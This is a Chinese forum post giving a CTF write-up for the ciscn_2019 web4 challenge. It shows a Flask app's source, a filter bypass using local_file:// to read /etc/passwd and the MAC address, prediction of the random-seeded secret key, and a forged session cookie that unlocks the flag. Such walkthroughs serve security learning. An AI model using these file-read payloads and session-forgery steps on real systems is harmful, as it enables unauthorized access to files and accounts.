学逆向论坛

找回密码
立即注册

只需一步,快速开始

发新帖

2万

积分

41

好友

1168

主题
发表于 2020-5-9 12:54:06 | 查看: 3195| 回复: 0
  进入题目页面会提示read something,点击会进入如下链接的页面:
http://xuenixiang.cn/read?url=https://baidu.com
  页面显示no response。
  尝试利用url读取文件,使用file:///etc/passwd。
  提示no hack。
  看着url不像是PHP,因为我好像极少见过PHP用这种路由,直接冒一波险猜他是flask。使用local_file:///etc/passwd读取。
  冒险成功。

ciscn_2019_web_southeastern-china-web4

ciscn_2019_web_southeastern-china-web4
  接下来读app/app.py把源码拿下来。
import re, random, uuid, urllib
from flask import Flask, session, request

app = Flask(__name__)
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*233)
app.debug = True

@app.route('/')
def index():
    session['username'] = 'www-data'
    return 'Hello World! <a href="/read?url=https://baidu.com">Read somethings</a>'

@app.route('/read')
def read():
    try:
        url = request.args.get('url')
        m = re.findall('^file.*', url, re.IGNORECASE)
        n = re.findall('flag', url, re.IGNORECASE)
        if m or n:
            return 'No Hack'
        res = urllib.urlopen(url)
        return res.read()
    except Exception as ex:
        print str(ex)
    return 'no response'

@app.route('/flag')
def flag():
    if session and session['username'] == 'fuck':
        return open('/flag.txt').read()
    else:
        return 'Access denied'

if __name__=='__main__':
    app.run(
        debug=True,
        host="0.0.0.0"
    )
  在源码中可以看到有一个flag路由,如果session的username为fuck可以直接得到flag。所以接下来的关键就是看看能不能伪造session。
  伪造session需要密钥,正好源码中涉及了。
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*233)
  对于伪随机数,如果seed是固定的,生成的随机数是可以预测的,也就是顺序固定的,所以只要知道seed的值即可。这里的seed使用的uuid.getnode()的值,该函数用于获取Mac地址并将其转换为整数。所以我们还需要读一下Mac地址。
  使用的payload为local_file:///sys/class/net/eth0/address
  得到Mac地址为:02:42:ae:01:d9:0e。
  接下来使用python2求解,因为python3和python2的str保留的位数不一样。
import random
random.seed(0x0242ae01d90e)
print(str(random.random()*233))
  得到115.152461339。
  接下来使用github的flask-session-manager进行加解密。
  首先解密session得到{u'username': 'www-data'},将www-data换成fuck并加密得到:
  eyJ1c2VybmFtZSI6eyIgYiI6IlpuVmphdz09In19.XonT0Q.wFSm3JOFRrHW-whBsQRIwAn64_0。
  访问/flag并修改session得到flag。

ciscn_2019_web_southeastern-china-web4

ciscn_2019_web_southeastern-china-web4


温馨提示:
1.如果您喜欢这篇帖子,请给作者点赞评分,点赞会增加帖子的热度,评分会给作者加学币。(评分不会扣掉您的积分,系统每天都会重置您的评分额度)。
2.回复帖子不仅是对作者的认可,还可以获得学币奖励,请尊重他人的劳动成果,拒绝做伸手党!
3.发广告、灌水回复等违规行为一经发现直接禁言,如果本帖内容涉嫌违规,请点击论坛底部的举报反馈按钮,也可以在【投诉建议】板块发帖举报。
论坛交流群:672619046

小黑屋|手机版|站务邮箱|学逆向论坛 ( 粤ICP备2021023307号 )|网站地图

GMT+8, 2024-11-23 01:17 , Processed in 0.124125 second(s), 39 queries .

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表